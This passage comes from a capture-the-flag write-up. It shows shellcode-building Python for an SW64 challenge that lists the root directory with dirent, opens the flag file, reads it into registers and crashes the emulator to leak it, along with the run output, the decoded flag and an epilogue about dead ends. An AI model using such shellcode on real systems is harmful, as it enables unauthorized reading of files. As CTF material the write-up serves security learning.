Next we are calling dirent. The main reason is that the flags file name includes a UUID that we definitely don’t know and can’t even guess.
Dirent reads filenames and some metadata into a buffer. So we plan to read the contents of “/” into a buffer at sp.
offset = 48+16 # Worked out through experimentation
# Overwrite prepend / to flag filename
payload += ldq(t0, sp, offset+0) # Load data one byte before flag filename into t0
payload += ldq(t1, t12, data_offset+0x30) # Load data containing the difference into t1
payload += add(t0, t1, t0) # Add to t0 to effectively prepend /
payload += stq(t0, sp, offset) # Write data back to buffer
# Open /flag-foo-bar-baz-lorem-ipsum
payload += ldq(t1, t12, data_offset+0x38) #Load offset inside sp into t1
payload += add(a0, sp, t1) #Set a0 to sp+t1
payload += mov(a1, zero_reg) #Set a1 to 0, O_READONLY
payload += ldq(v0, t12, data_offset) #syscall_open
payload += syscall_0()
payload += p64(0x2f00-0x0040) #0x30
payload += p64(48+17)
Through reading the memory I worked out where the offset to the flag filename is.
Unfortunately the filenames returned by dirent don’t include the leading slash, so I’m doing some trickery to prepend ‘/’ in the buffer.
After that I set a0 to point to the filename, now with ‘/’ prepended, and a1 to be O_RDONLY and open the flag file.
All that’s left is to read the flag.
#read flag
payload += mov(a0, v0) # Move new fd into a0
payload += mov(a1, sp) # Move sp into a1
payload += ldq(a2, t12, data_offset+0x28) # move 200 into a2
payload += ldq(v0, t12, data_offset+0x40) # move syscall# of read into v0
payload += syscall_0() #syscall_read
# Read flag into registers and crash
payload += ldq(t0, sp, 0)
payload += ldq(t1, sp, 8)
payload += ldq(t2, sp, 16)
payload += ldq(t3, sp, 24)
payload += break_code
payload += p64(200) #0x28
payload += p64(0x2f00-0x0040) #0x30
payload += p64(48+17)
payload += p64(syscall_no_read)#0x40
Calling read works very similar again. We move the new fd of the flag file into a0, we move sp into a1, we load 200 into a2 and the syscall number of read into v0.
After issuing the syscall, the data of the flag file, should now be at sp.
So we simply load the data into t0-t3 and crash the machine one last time.
[firzen@archlinux blog]$ python3 exploit.py [+] Opening connection to localhost on port 5000: Done [*] Closed connection to localhost port 5000 here 4000a1c074 qemu: fatal: ILLEGAL SW64 insn at line 42! PC=0000004000a1c074 SP=0000004000801d50 v0=000000000000001f t0=7b6b63756c746f70 t1=6f6f672d72756f79 t2=692d75662d656c67 t3=007d646f6f672d73 t4=0000000000000000 t5=0000000000000000 t6=0000000000000002
Decoding those values gives the following.
>>> binascii.unhexlify("007d646f6f672d73692d75662d656c676f6f672d72756f797b6b63756c746f70")[::-1] b'potluck{your-google-fu-is-good}\x00'
And that’s when I realised I might not have solved the challenge the intended way.
Epilogue
While I later learned that my solution wasn’t exactly the intended way, apparently the other solvers had done it in similar ways.
It was intended that one could have found a compiler somewhere on the chinese internet. Honestly, I think I would have enjoyed this challenge a lot less if I had solved it the intended way.
This post was more of a writeup of how I arrived at the solution, rather than a description of all the rabbit holes I fell into. So to avoid the impression that I solved this challenge without any trouble, I’ll just give a quick rundown of things I ran into.
- Missed that the challenge description said ‘ “”unknown”” architecture’ in double quotes for the first day.
- Found a qemu build that claimed to be sw64, spent some time learning about tcg only to realise after a few hours that the emulator had just renamed MIPS.
- Misinterpreted some of the results I was seeing and assumed that some instructions may not be 4 bytes wide.
- I dumped the compiled challenge.c file from memory, hoping that I could more easily reverse engineer instructions. Wasn’t helpful AT ALL